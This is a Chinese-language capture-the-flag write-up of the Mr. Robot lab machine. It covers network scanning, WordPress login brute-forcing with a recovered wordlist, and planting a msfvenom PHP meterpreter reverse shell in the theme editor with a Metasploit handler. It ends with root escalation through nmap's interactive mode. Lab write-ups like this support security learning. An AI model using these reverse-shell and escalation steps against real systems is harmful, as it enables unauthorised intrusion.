mrRobot靶机分析

信息收集

IP地址:arp-scan -l

192.168.47.165

端口服务: nmap -sV -A -p- 192.168.47.165 --open

在这里插入图片描述

都是常见端口,22是ssh服务,80是web服务,
443倒不太清楚(只是很多次看到) --- 哦对,HTTPS传输用的是这个端口,
没有什么特殊信息

**访问web服务,目录扫描:**页面很酷炫,

**1.**扫描到了一个 url/feed 目录 -> 一些xml格式的数据

在这里插入图片描述

-> 看到了wordpress的字眼 ,想起来用扩展工具看一眼网站架构 果然是通过wordpress搭建的

2. 扫描到了robots.txt,

在这里插入图片描述

一个flag吧好像(我没看原题简介,下载的时候好像说是三个flag,看样子像是第一个)

另外一个是字典文件 — 肯定是用来爆破的,加上之前确认的wordpress框架 -> 猜测是admin后台密码爆破

通过 wget http://192.168.47.165/fsocity.dic 下载下来

3. 扫到了wp-admin目录 -> 果然,wordpress后台页面

接下来就是用wpscan扫描一下用户名(我直接就认为那个是密码的字典了),

wpscan --url http://192.168.47.165 --enumerate

在这里插入图片描述

-> 并没有扫到用户名

我一下子就不会了,去看了wp,说是账号密码都用这个字典,对啊,这都没想到

但是,这都用一个字典,我了个,真多,时间太长了

真不能等了,看wp了

用户名:elliot
密码:ER28-0652

OK了,成功登录进来了

漏洞

在这里插入图片描述

在这里的编辑模块插入反弹shell的代码,通过msf连接

通过以下命令生成payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.47.135 lport=6666 -f raw >/root/shell.php

在这里插入图片描述

插入上面的代码,然后在终端运行以下代码,接着访问php页面,从而反弹shell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.47.135
set lport 6666
run

在这里插入图片描述

有一点就是路径的问题(我的看wp,或许因为是wp框架吧,所以能够猜出来)

在这里插入图片描述

提权

首先看有几个用户,sudo -l看一下啊

查找一下suid权限的命令

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

但是当前用户下没有执行nmap的权限,

/home目录下,还有一个robot用户,且该用户的路径下存在一个flag,另外一个文件是密码的哈希值,破解得到

abcdefghijklmnopqrstuvwxyz,我自己没得到,看的wp

然后切换到robot用户下,可以执行nmap命令

在这里插入图片描述

总结

msf的一些使用

nmap提权,交互模式下

nmap在2.02--5.21版本中都带有交互模式,允许用户执行shell命令
nmap --interactive #进入到nmap的交互模式
!# 		# 获取shell
参考

https://www.cnblogs.com/PANDA-Mosen/p/13199080.html

nmap --interactive #进入到nmap的交互模式
!# # 获取shell




#### 参考

https://www.cnblogs.com/PANDA-Mosen/p/13199080.html

https://developer.aliyun.com/article/1362867?spm=5176.26934562.main.4.3e234ed5C2y5M1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值